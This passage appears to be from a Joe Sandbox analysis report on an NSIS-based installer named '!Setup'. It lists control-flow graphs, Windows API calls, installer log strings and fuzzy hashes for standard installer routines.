303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                APIs
                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                • API String ID: 2435955865-3712954417
                                                                                • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 587 406831-40683c 588 40683e-40684d 587->588 589 40684f-406863 587->589 588->589 590 406865-406872 589->590 591 40687b-406881 589->591 590->591 592 406874-406877 590->592 593 406887-406888 591->593 594 406aad-406ab6 591->594 592->591 597 406889-406896 593->597 595 406ac1-406ac2 594->595 596 406ab8-406abc call 406035 594->596 596->595 599 406aab-406aac 597->599 600 40689c-4068ac 597->600 599->594 601 4068b2-4068b5 600->601 602 406a86 600->602 603 406a89 601->603 604 4068bb-4068f9 601->604 602->603 605 406a99-406a9c 603->605 606 406a8b-406a97 603->606 607 406a19-406a22 604->607 608 4068ff-40690a GetVersion 604->608 611 406a9f-406aa5 605->611 606->611 609 406a24-406a27 607->609 610 406a5b-406a64 607->610 612 406928 608->612 613 40690c-406914 608->613 617 406a37-406a46 call 406035 609->617 618 406a29-406a35 call 405f7d 609->618 615 406a72-406a84 lstrlenW 610->615 616 406a66-406a6d call 406831 610->616 611->597 611->599 614 40692f-406936 612->614 613->612 619 406916-40691a 613->619 621 406938-40693a 614->621 622 40693b-40693d 614->622 615->611 616->615 626 406a4b-406a51 617->626 618->626 619->612 625 40691c-406920 619->625 621->622 627 406979-40697c 622->627 628 40693f-406965 call 405eff 622->628 625->612 630 406922-406926 625->630 626->615 631 406a53-406a59 call 406064 626->631 633 40698c-40698f 627->633 634 40697e-40698a GetSystemDirectoryW 627->634 641 406a05-406a09 628->641 642 40696b-406974 call 406831 628->642 630->614 631->615 638 406991-40699f GetWindowsDirectoryW 633->638 639 4069fb-4069fd 633->639 637 4069ff-406a03 634->637 637->631 637->641 638->639 639->637 643 4069a1-4069ab 639->643 641->631 645 406a0b-406a17 lstrcatW 641->645 642->637 646 4069c5-4069db SHGetSpecialFolderLocation 643->646 647 4069ad-4069b0 643->647 645->631 649 4069f6-4069f8 646->649 650 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 646->650 647->646 648 4069b2-4069b9 647->648 652 4069c1-4069c3 648->652 649->639 650->637 650->649 652->637 652->646
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406A73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 3581403547-1792361021
                                                                                • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID: jF
                                                                                • API String ID: 2295610775-3349280890
                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                • String ID:
                                                                                • API String ID: 310444273-0
                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                APIs
                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                Strings
                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                • Call: %d, xrefs: 0040165A
                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                • detailprint: %s, xrefs: 00401679
                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                • Jump: %d, xrefs: 00401602
                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                • BringToFront, xrefs: 004016BD
                                                                                • Rename: %s, xrefs: 004018F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                • API String ID: 2872004960-3619442763
                                                                                • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                • ShowWindow.USER32(?), ref: 004054FE
                                                                                • DestroyWindow.USER32 ref: 00405512
                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                • String ID:
                                                                                • API String ID: 3282139019-0
                                                                                • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
